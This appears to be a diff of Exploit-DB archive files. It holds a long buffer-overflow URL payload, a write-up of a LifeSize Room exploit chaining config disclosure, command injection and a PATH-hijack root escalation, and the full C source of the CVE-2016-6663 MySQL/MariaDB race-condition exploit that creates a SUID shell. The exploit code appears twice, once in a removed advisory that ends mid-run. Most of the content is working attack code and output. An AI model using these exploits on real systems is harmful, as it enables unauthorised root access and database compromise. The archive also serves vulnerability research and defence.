# Eg: http://IP/cgi-bin/image.cgi?userName=-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ЯR qwsj 2016

84
platforms/hardware/webapps/40690.txt Executable file
View file

@ -0,0 +1,84 @@
Source: https://github.com/XiphosResearch/exploits/tree/master/deathsize
LifeSize Room 5.0.9, remote config disclosure, code execution & local privilege escalation
Ultimately the Lifesize Room products have fundamentally flawed firmware, many similar very bugs in the WebUI exist and thier support team have been recommending that port 443 isn't accessible via the internet.
They've been alerted to several very similar bugs, and in some cases have fixed one gaping security hole only to leave another one literally 10 lines above completely untouched. facepalm
What makes this different? This exploit will run your payload as root.
Description
This exploit uses the LsSystemRestore.sh script to disclose the current configuration, that is then leveraged to gain access to exploitable APIs in the admin portal which allow arbitrary command injection, then uses a local privilege escalation bug to execute the payload as root.
This will work as long as port 443 is open on the phone, Lifesize support should recommend that the power and ethernet cables are disconnected from the device to ensure it remains secure.
LsSystemRestore.sh allows autosh commands to be executed without any authentication, this is used to grab the Admin password via the get config -P command.
Using the Admin password AMF commands can be sent to the LSRoom_Remoting endpoint, this contains a method called doPrefCommand which is vulnerable to command injection.
function doPrefCommand($cmd, $id){
// Look for the existence of a "pref " and ";" needle.
$invalidCmd = $this->scrubPrefString($cmd);
if ( $invalidCmd )
{
return "invalid_command";
}
// If we get to here, we want to double check the command for
// any unwanted characters: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and "
//$cleanCommand = escapeshellcmd($cmd);
$prefData = array();
$value = rtrim(shell_exec($cmd));
What's interesting here is that the escapeshellcmd function is commented out, this would have prevented the command injection, but all of the code on the firmware smells of barely competent development and least-effort attempts to patch security vulnerabilities.
Local privilege escalation to root is gained by executing the setuid tcpdump_manager executable, which runs a program called reset_tcpdump using PATH to resolve its location using PATH=/tmp:$PATH tcpdump_manager
Other exploits exist in the 'support' portal, providing command execution, for example in support/download_file.php:
<html>
<head>
<?php
print('
</head>
<body>
<h1>Download File </h1>
');
$file_to_download=$_REQUEST['file_to_download'];
{
print("<hr>\n");
shell_exec("rm tmp/tmp-file.tmp");
shell_exec("cp $file_to_download tmp/tmp-file.tmp");
Usage
$ deathsize.php 192.168.40.39 payload
[*] Retrieving admin password
[*] Saving config for 192.168.40.39
[*] Admin password is: 1234
[*] Authenticating for AMF RPC
[*] Sending command: ...
...
This will save the configuration for the device into the local file 192.168.40.39.config and then execute the code in your payload file as root on the device and print out the response.
Timeline
13th June 2016 - Notified LifeSize of multiple vulnerabilities
15th June - LifeSize start spamming my inbox with marketing messages
16th June - Requested escallation, support requested demo
22nd June - Telling LifeSize that no... just changing the password doesn't fix it
30th June - Test device provided by support
1st July - Owned their test device running latest firmware
4th July - Support can't reproduce or understand exploit
5th July - Engineering ticket created
7th July - Support recommend adding firewall, sigh
8th August - Provide PoC
Have had no further contact with them, unable to get a CVE assigned for this, product will be EOL in January 2017, seems like there's no firmware update coming...
Full Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40690.zip

273
platforms/linux/local/40678.c Executable file
View file

@ -0,0 +1,273 @@
/*
Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
mysql-privesc-race.c (ver. 1.0)
CVE-2016-6663 / OCVE-2016-5616
Discovered/Coded by:
Dawid Golunski
dawid[at]legalhackers.com
https://legalhackers.com
Follow https://twitter.com/dawid_golunski for updates on this advisory.
Compile:
gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
Note:
* On RedHat-based systems you might need to change /tmp to another public directory (e.g. /uploads)
* For testing purposes only. Do no harm.
Full advisory URL:
https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
Video PoC:
https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
*/
#include <fcntl.h>
#include <grp.h>
#include <mysql.h>
#include <pwd.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#define EXP_PATH "/tmp/mysql_privesc_exploit"
#define EXP_DIRN "mysql_privesc_exploit"
#define MYSQL_TAB_FILE EXP_PATH "/exploit_table.MYD"
#define MYSQL_TEMP_FILE EXP_PATH "/exploit_table.TMD"
#define SUID_SHELL EXP_PATH "/mysql_suid_shell.MYD"
#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary
MYSQL *conn; // DB handles
MYSQL_RES *res;
MYSQL_ROW row;
unsigned long cnt;
void intro() {
printf(
"\033[94m\n"
"MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\n"
"mysql-privesc-race.c (ver. 1.0)\n\n"
"CVE-2016-6663 / OCVE-2016-5616\n\n"
"For testing purposes only. Do no harm.\n\n"
"Discovered/Coded by:\n\n"
"Dawid Golunski \n"
"http://legalhackers.com"
"\033[0m\n\n");
}
void usage(char *argv0) {
intro();
printf("Usage:\n\n%s user pass db_host database\n\n", argv0);
}
void mysql_cmd(char *sql_cmd, int silent) {
if (!silent) {
printf("%s \n", sql_cmd);
}
if (mysql_query(conn, sql_cmd)) {
fprintf(stderr, "%s\n", mysql_error(conn));
exit(1);
}
res = mysql_store_result(conn);
if (res>0) mysql_free_result(res);
}
int main(int argc,char **argv)
{
int randomnum = 0;
int io_notified = 0;
int myd_handle;
int wpid;
int is_shell_suid=0;
pid_t pid;
int status;
struct stat st;
/* io notify */
int fd;
int ret;
char buf[4096] __attribute__((aligned(8)));
int num_read;
struct inotify_event *event;
/* credentials */
char *user = argv[1];
char *password = argv[2];
char *db_host = argv[3];
char *database = argv[4];
// Disable buffering of stdout
setvbuf(stdout, NULL, _IONBF, 0);
// Get the params
if (argc!=5) {
usage(argv[0]);
exit(1);
}
intro();
// Show initial privileges
printf("\n[+] Starting the exploit as: \n");
system("id");
// Connect to the database server with provided credentials
printf("\n[+] Connecting to the database `%s` as %s@%s\n", database, user, db_host);
conn = mysql_init(NULL);
if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {
fprintf(stderr, "%s\n", mysql_error(conn));
exit(1);
}
// Prepare tmp dir
printf("\n[+] Creating exploit temp directory %s\n", "/tmp/" EXP_DIRN);
umask(000);
system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN);
system("chmod g+s /tmp/" EXP_DIRN );
// Prepare exploit tables :)
printf("\n[+] Creating mysql tables \n\n");
mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0);
mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0);
mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);
mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);
// Copy /bin/bash into the mysql_suid_shell.MYD mysql table file
// The file should be owned by mysql:attacker thanks to the sticky bit on the table directory
printf("\n[+] Copying bash into the mysql_suid_shell table.\n After the exploitation the following file/table will be assigned SUID and executable bits : \n");
system("cp /bin/bash " SUID_SHELL);
system("ls -l " SUID_SHELL);
// Use inotify to get the timing right
fd = inotify_init();
if (fd < 0) {
printf("failed to inotify_init\n");
return -1;
}
ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);
/* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */
printf("\n[+] Entering the race loop... Hang in there...\n");
while ( is_shell_suid != 1 ) {
cnt++;
if ( (cnt % 100) == 0 ) {
printf("->");
//fflush(stdout);
}
/* Create empty file , remove if already exists */
unlink(MYSQL_TEMP_FILE);
unlink(MYSQL_TAB_FILE);
mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1);
mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1);
/* random num if needed */
srand ( time(NULL) );
randomnum = ( rand() % MAX_DELAY );
// Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink
pid = fork();
if (pid < 0) {
fprintf(stderr, "Fork failed :(\n");
}
/* Child process - executes REPAIR TABLE SQL statement */
if (pid == 0) {
usleep(500);
unlink(MYSQL_TEMP_FILE);
mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1);
// child stops here
exit(0);
}
/* Parent process - aims to replace the temp .tmd table with a symlink before chmod */
if (pid > 0 ) {
io_notified = 0;
while (1) {
int processed = 0;
ret = read(fd, buf, sizeof(buf));
if (ret < 0) {
break;
}
while (processed < ret) {
event = (struct inotify_event *)(buf + processed);
if (event->mask & IN_CLOSE) {
if (!strcmp(event->name, "exploit_table.TMD")) {
//usleep(randomnum);
// Set the .MYD permissions to suid+exec before they get copied to the .TMD file
unlink(MYSQL_TAB_FILE);
myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);
close(myd_handle);
chmod(MYSQL_TAB_FILE, 04777);
// Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec
unlink(MYSQL_TEMP_FILE);
symlink(SUID_SHELL, MYSQL_TEMP_FILE);
io_notified=1;
}
}
processed += sizeof(struct inotify_event);
}
if (io_notified) {
break;
}
}
waitpid(pid, &status, 0);
}
// Check if SUID bit was set at the end of this attempt
if ( lstat(SUID_SHELL, &st) == 0 ) {
if (st.st_mode & S_ISUID) {
is_shell_suid = 1;
}
}
}
printf("\n\n[+] \033[94mBingo! Race won (took %lu tries) !\033[0m Check out the \033[94mmysql SUID shell\033[0m: \n\n", cnt);
system("ls -l " SUID_SHELL);
printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n");
system(SUID_SHELL " -p -i ");
//system(SUID_SHELL " -p -c '/bin/bash -i -p'");
/* close MySQL connection and exit */
printf("\n[+] Job done. Exiting\n\n");
mysql_close(conn);
return 0;
}

765
platforms/linux/local/40678.txt
View file

@ -1,765 +0,0 @@
=============================================
- Release date: 01.11.2016
- Discovered by: Dawid Golunski
- Severity: Critical
- CVE-2016-6663 / OCVE-2016-5616
- http://legalhackers.com
=============================================
I. VULNERABILITY
-------------------------
MySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition
MariaDB
< 5.5.52
< 10.1.18
< 10.0.28
MySQL
<= 5.5.51
<= 5.6.32
<= 5.7.14
Percona Server
< 5.5.51-38.2
< 5.6.32-78-1
< 5.7.14-8
Percona XtraDB Cluster
< 5.6.32-25.17
< 5.7.14-26.17
< 5.5.41-37.0
II. BACKGROUND
-------------------------
MySQL:
"MySQL is the world's most popular open source database.
Whether you are a fast growing web property, technology ISV or large
enterprise, MySQL can cost-effectively help you deliver high performance,
scalable database applications."
"Many of the world's largest and fastest-growing organizations including
Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time
and money powering their high-volume Web sites, business-critical systems and
packaged software."
http://www.mysql.com/products/
http://www.mysql.com/why-mysql/
--
MariaDB:
"MariaDB is one of the most popular database servers in the world.
Its made by the original developers of MySQL and guaranteed to stay open source.
Notable users include Wikipedia, WordPress.com and Google.
MariaDB turns data into structured information in a wide array of applications,
ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL.
MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of
storage engines, plugins and many other tools make it very versatile for a wide
variety of use cases."
https://mariadb.org/about/
--
PerconaDB:
"Percona Server for MySQL® is a free, fully compatible, enhanced, open source
drop-in replacement for MySQL that provides superior performance, scalability
and instrumentation.
With over 3,000,000 downloads, Percona Servers self-tuning algorithms and support
for extremely high-performance hardware delivers excellent performance and reliability."
https://www.percona.com/software/mysql-database/percona-server
III. INTRODUCTION
-------------------------
An independent research has revealed a race condition vulnerability which is
present in MySQl, MariaDB and PerconaDB databases.
The vulnerability can allow a local system user with access to the affected
database in the context of a low-privileged account (CREATE/INSERT/SELECT grants)
to escalate their privileges and execute arbitrary code as the database system
user (typically 'mysql').
Successful exploitation would allow an attacker to gain access to all of the
databases stored on the affected database server.
The obtained level of access upon the exploitation, could be chained with
the other privilege escalation vulnerabilities discovered by the author of
this advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges
from mysql user to root user and thus allow attackers to fully compromise the
target server.
IV. DESCRIPTION
-------------------------
Table locations
~~~~~~~~~~~~~~~~~~
MySQL-based databases allow users with CREATE table privilege to optionally
specify a disk path of the directory where the table will be stored via a DATA
DIRECTORY parameter in the CREATE statement.
Users who have access to a database account with CREATE grant could create a
table under a directory that they can control. For example:
attacker@debian:~$ mkdir /tmp/disktable
attacker@debian:~$ chmod 777 /tmp/disktable/
attacker@debian:~$ ls -ld /tmp/disktable/
drwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/
A user could then place a table within the directory with the following SQL
statement:
mysql> CREATE TABLE poctab1 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';
which would result in creating the following table file:
attacker@debian:~$ ls -l /tmp/disktable/
total 0
-rw-rw---- 1 mysql mysql 0 Oct 28 10:53 poctab1.MYD
Race Condition
~~~~~~~~~~~~~~~~~~
Observing file operations performed on the table stored within the directory,
it was discovered that REPAIR TABLE SQL statement which is available to
low-privileged users with SELECT/CREATE/INSERT grants, performed unsafe
operations on temporary files created during the table repair process.
Executing the statement:
mysql> REPAIR TABLE `poctab1`;
+----------------+--------+----------+----------+
| Table | Op | Msg_type | Msg_text |
+----------------+--------+----------+----------+
| testdb.poctab1 | repair | status | OK |
+----------------+--------+----------+----------+
would result in execution of the following system calls:
[pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
[pid 1463] open("/tmp/disktable/poctab1.MYD", O_RDWR) = 65
[pid 1463] access("./testdb/poctab1.TRG", F_OK) = -1 ENOENT (No such file or directory)
[pid 1463] lseek(65, 0, SEEK_CUR) = 0
[pid 1463] lseek(65, 0, SEEK_END) = 0
[pid 1463] mprotect(0x7f6a3804f000, 12288, PROT_READ|PROT_WRITE) = 0
[pid 1463] open("/tmp/disktable/poctab1.TMD", O_RDWR|O_CREAT|O_EXCL|O_TRUNC, 0660) = 66
[pid 1463] lseek(65, 0, SEEK_END) = 0
[pid 1463] lseek(64, 0, SEEK_END) = 1024
[pid 1463] close(65) = 0
[pid 1463] close(66) = 0
[pid 1463] lstat("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0
[pid 1463] lstat("/tmp/disktable", {st_mode=S_IFDIR|0777, st_size=4096, ...}) = 0
[pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
[pid 1463] stat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
[pid 1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0
[pid 1463] chown("/tmp/disktable/poctab1.TMD", 110, 115) = 0
[pid 1463] unlink("/tmp/disktable/poctab1.MYD") = 0
[pid 1463] rename("/tmp/disktable/poctab1.TMD", "/tmp/disktable/poctab1.MYD") = 0
The first call:
[pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
was found to check file permissions of poctab1.MYD table which are then copied with chmod()
to the newly created poctab1.TMD temporary file containing the repaired table.
The code is vulnerable to Race Condition between the call:
[pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
and
[pid 1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0
If an attacker managed to unlink the temporary table poctab1.TMD and replace it
with a symlink to /var/lib/mysql before the chmod() operation (i.e. win the race),
they would be able to apply arbitrary permissions on the data directory.
The attacker would be able to control the set of permissions by pre-setting them on
poctab1.MYD file before executing the REPAIR TABLE statement.
For example, by setting the permissions of poctab1.MYD to 777 the data directory
would become readable and writable to the attacker.
Obtaining mysql-suid shell
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Apart from gaining access to arbitrary mysql files, the attacker could also
achieve arbitrary code execution in the context of mysql user (mysql shell).
This could be done by first pre-setting permissions on poctab1.MYD to 04777
(suid), and winning the race so that the permissions get applied on a copy
of a bash shell file through the vulnerable chmod() call effectively creating
a shell that elevates their permissions after execution.
There is only one problem. Their suid shell would remain to be owned by the
attacker's user id and not 'mysql' user.
To elevate their privileges, attacker would need to copy the bash shell to a
mysql-owned table file which are owned by mysql user. However mysql table
files are not writable by other users making it impossible for attacker to save
the shell.
This could be bypassed if attacker created a specially crafted directory
with a group sticky bit and then created a second table named 'poctab2' as
follows:
attacker@debian:/tmp/disktable$ chmod g+s /tmp/disktable/
attacker@debian:/tmp/disktable$ ls -ld /tmp/disktable/
drwxrwsrwx 2 attacker attacker 4096 Oct 28 11:25 /tmp/disktable/
mysql> CREATE TABLE poctab2 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';
Query OK, 0 rows affected (0.00 sec)
attacker@debian:/tmp/disktable$ ls -l /tmp/disktable/
total 0
-rw-rw---- 1 mysql mysql 0 Oct 28 11:04 poctab1.MYD
-rw-rw---- 1 mysql attacker 0 Oct 28 11:34 poctab2.MYD
As we can see poctab2.MYD table (thanks to the sticky bit (+s) on the permissions
of the group on disktable directory) has 'mysql' as the owner but 'attacker'
as the group.
Therefore, the attacker would now be able to copy /bin/bash to poctab2.MYD file
and preserve the file owner.
Finally, they could exploit the Race Condition again and have SUID + exec
permissions applied on poctab2.MYD which would then allow them to execute the suid
shell with elevated privileges of the mysql user.
From mysql to root
~~~~~~~~~~~~~~~~~~~~~~~~
After obtaining a mysql suid shell, attackers could then exploit one of the
other MySQL vulnerabilities discovered by the author of this advisory:
CVE-2016-6662
or
CVE-2016-6664 (OCVE-2016-5617)
to escalate their privileges from mysql user to root system user.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
------------------[ mysql-privesc-race.c ]--------------------
/*
MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
mysql-privesc-race.c (ver. 1.0)
CVE-2016-6663 / OCVE-2016-5616
Discovered/Coded by:
Dawid Golunski
dawid[at]legalhackers.com
@dawid_golunski
http://legalhackers.com
Compile:
gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
Note:
* On RedHat-based systems you might need to change /tmp to another public directory
* For testing purposes only. Do no harm.
Full advisory URL:
http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
*/
#include <fcntl.h>
#include <grp.h>
#include <mysql.h>
#include <pwd.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#define EXP_PATH "/tmp/mysql_privesc_exploit"
#define EXP_DIRN "mysql_privesc_exploit"
#define MYSQL_TAB_FILE EXP_PATH "/exploit_table.MYD"
#define MYSQL_TEMP_FILE EXP_PATH "/exploit_table.TMD"
#define SUID_SHELL EXP_PATH "/mysql_suid_shell.MYD"
#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary
MYSQL *conn; // DB handles
MYSQL_RES *res;
MYSQL_ROW row;
unsigned long cnt;
void intro() {
printf(
"\033[94m\n"
"MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\n"
"mysql-privesc-race.c (ver. 1.0)\n\n"
"CVE-2016-6663 / OCVE-2016-5616\n\n"
"For testing purposes only. Do no harm.\n\n"
"Discovered/Coded by:\n\n"
"Dawid Golunski \n"
"http://legalhackers.com"
"\033[0m\n\n");
}
void usage(char *argv0) {
intro();
printf("Usage:\n\n%s user pass db_host database\n\n", argv0);
}
void mysql_cmd(char *sql_cmd, int silent) {
if (!silent) {
printf("%s \n", sql_cmd);
}
if (mysql_query(conn, sql_cmd)) {
fprintf(stderr, "%s\n", mysql_error(conn));
exit(1);
}
res = mysql_store_result(conn);
if (res>0) mysql_free_result(res);
}
int main(int argc,char **argv)
{
int randomnum = 0;
int io_notified = 0;
int myd_handle;
int wpid;
int is_shell_suid=0;
pid_t pid;
int status;
struct stat st;
/* io notify */
int fd;
int ret;
char buf[4096] __attribute__((aligned(8)));
int num_read;
struct inotify_event *event;
/* credentials */
char *user = argv[1];
char *password = argv[2];
char *db_host = argv[3];
char *database = argv[4];
// Disable buffering of stdout
setvbuf(stdout, NULL, _IONBF, 0);
// Get the params
if (argc!=5) {
usage(argv[0]);
exit(1);
}
intro();
// Show initial privileges
printf("\n[+] Starting the exploit as: \n");
system("id");
// Connect to the database server with provided credentials
printf("\n[+] Connecting to the database `%s` as %s@%s\n", database, user, db_host);
conn = mysql_init(NULL);
if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {
fprintf(stderr, "%s\n", mysql_error(conn));
exit(1);
}
// Prepare tmp dir
printf("\n[+] Creating exploit temp directory %s\n", "/tmp/" EXP_DIRN);
umask(000);
system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN);
system("chmod g+s /tmp/" EXP_DIRN );
// Prepare exploit tables :)
printf("\n[+] Creating mysql tables \n\n");
mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0);
mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0);
mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);
mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);
// Copy /bin/bash into the mysql_suid_shell.MYD mysql table file
// The file should be owned by mysql:attacker thanks to the sticky bit on the table directory
printf("\n[+] Copying bash into the mysql_suid_shell table.\n After the exploitation the following file/table will be assigned SUID and executable bits : \n");
system("cp /bin/bash " SUID_SHELL);
system("ls -l " SUID_SHELL);
// Use inotify to get the timing right
fd = inotify_init();
if (fd < 0) {
printf("failed to inotify_init\n");
return -1;
}
ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);
/* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */
printf("\n[+] Entering the race loop... Hang in there...\n");
while ( is_shell_suid != 1 ) {
cnt++;
if ( (cnt % 100) == 0 ) {
printf("->");
//fflush(stdout);
}
/* Create empty file , remove if already exists */
unlink(MYSQL_TEMP_FILE);
unlink(MYSQL_TAB_FILE);
mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1);
mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1);
/* random num if needed */
srand ( time(NULL) );
randomnum = ( rand() % MAX_DELAY );
// Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink
pid = fork();
if (pid < 0) {
fprintf(stderr, "Fork failed :(\n");
}
/* Child process - executes REPAIR TABLE SQL statement */
if (pid == 0) {
usleep(500);
unlink(MYSQL_TEMP_FILE);
mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1);
// child stops here
exit(0);
}
/* Parent process - aims to replace the temp .tmd table with a symlink before chmod */
if (pid > 0 ) {
io_notified = 0;
while (1) {
int processed = 0;
ret = read(fd, buf, sizeof(buf));
if (ret < 0) {
break;
}
while (processed < ret) {
event = (struct inotify_event *)(buf + processed);
if (event->mask & IN_CLOSE) {
if (!strcmp(event->name, "exploit_table.TMD")) {
//usleep(randomnum);
// Set the .MYD permissions to suid+exec before they get copied to the .TMD file
unlink(MYSQL_TAB_FILE);
myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);
close(myd_handle);
chmod(MYSQL_TAB_FILE, 04777);
// Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec
unlink(MYSQL_TEMP_FILE);
symlink(SUID_SHELL, MYSQL_TEMP_FILE);
io_notified=1;
}
}
processed += sizeof(struct inotify_event);
}
if (io_notified) {
break;
}
}
waitpid(pid, &status, 0);
}
// Check if SUID bit was set at the end of this attempt
if ( lstat(SUID_SHELL, &st) == 0 ) {
if (st.st_mode & S_ISUID) {
is_shell_suid = 1;
}
}
}
printf("\n\n[+] \033[94mBingo! Race won (took %lu tries) !\033[0m Check out the \033[94mmysql SUID shell\033[0m: \n\n", cnt);
system("ls -l " SUID_SHELL);
printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n");
system(SUID_SHELL " -p -i ");
//system(SUID_SHELL " -p -c '/bin/bash -i -p'");
/* close MySQL connection and exit */
printf("\n[+] Job done. Exiting\n\n");
mysql_close(conn);
return 0;
}
------------------[ EOF ]--------------------
Example run:
~~~~~~~~~~~~~~
attacker@xenial:~/mysql-exploit$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.1 LTS
Release: 16.04
Codename: xenial
attacker@xenial:~/mysql-exploit$ dpkg -l | grep -i mariadb-serv
ii mariadb-server 10.0.27-0ubuntu0.16.04.1 all MariaDB database server (metapackage depending on the latest version)
ii mariadb-server-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database server binaries
ii mariadb-server-core-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database core server files
attacker@xenial:~/mysql-exploit$ id
uid=1001(attacker) gid=1001(attacker) groups=1001(attacker)
attacker@xenial:~/mysql-exploit$ mysql -uattacker -ppocsql -hlocalhost pocdb -e 'show grants;'
+-----------------------------------------------------------------------------------------------------------------+
| Grants for attacker@localhost |
+-----------------------------------------------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'attacker'@'localhost' IDENTIFIED BY PASSWORD '*3CC3900C7B2B0A885AB128894FC10949340A09CC' |
| GRANT SELECT, INSERT, CREATE, DROP ON `pocdb`.* TO 'attacker'@'localhost' |
+-----------------------------------------------------------------------------------------------------------------+
attacker@xenial:~/mysql-exploit$ ls -l /var/lib/mysql/mysql/user.*
ls: cannot access '/var/lib/mysql/mysql/user.*': Permission denied
attacker@xenial:~/mysql-exploit$ time ./mysql-privesc-race attacker pocsql localhost pocdb
MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
mysql-privesc-race.c (ver. 1.0)
CVE-2016-6663 / OCVE-2016-5616
For testing purposes only. Do no harm.
Discovered/Coded by:
Dawid Golunski
http://legalhackers.com
[+] Starting the exploit as:
uid=1001(attacker) gid=1001(attacker) groups=1001(attacker)
[+] Connecting to the database `pocdb` as attacker@localhost
[+] Creating exploit temp directory /tmp/mysql_privesc_exploit
[+] Creating mysql tables
DROP TABLE IF EXISTS exploit_table
DROP TABLE IF EXISTS mysql_suid_shell
CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit'
CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit'
[+] Copying bash into the mysql_suid_shell table. After the exploitation the following file/table will be assigned SUID and executable bits :
-rw-rw---- 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
[+] Entering the race loop... Hang in there...
[+] Bingo! Race won (took 5 tries) ! Check out the mysql SUID shell:
